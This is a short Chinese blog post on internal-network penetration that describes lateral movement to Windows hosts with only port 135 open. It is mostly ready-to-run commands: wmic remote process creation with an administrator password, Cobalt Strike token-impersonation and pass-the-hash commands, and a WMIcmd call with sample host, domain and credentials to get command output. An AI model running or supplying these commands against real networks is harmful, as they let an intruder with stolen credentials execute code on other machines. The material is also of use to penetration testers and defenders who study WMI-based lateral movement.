[内网渗透]通过135端口进行横向
2021-11-04 16:09 rnss 阅读(1140) 评论(0) 编辑 收藏 举报若内网中有windows机器只开放了135端口,可通过wmi进行执行命令横向
前提:拥有目标凭证
wmic /node:<IP> /user:administrator /password:<password> process call create "cmd.exe /c ipconfig > C:\ipconfig.txt"
在CS中如果有令牌或pth可以不用帐号密码
make_token administrator <password>
# pth administrator <hash>
wmic /node:<IP> process call create "cmd.exe /c ipconfig > C:\ipconfig.txt"
可是这样执行命令没有回显,如何能有回显?
使用WMIcmd
https://github.com/nccgroup/WMIcmd
但是有个前提是要知道hostname(不在域内的机器)或域名(在域内的机器)
WMIcmd.exe -h 192.168.77.171 -d WIN-887RATLMALI -u administrator -p 123456 -c whoami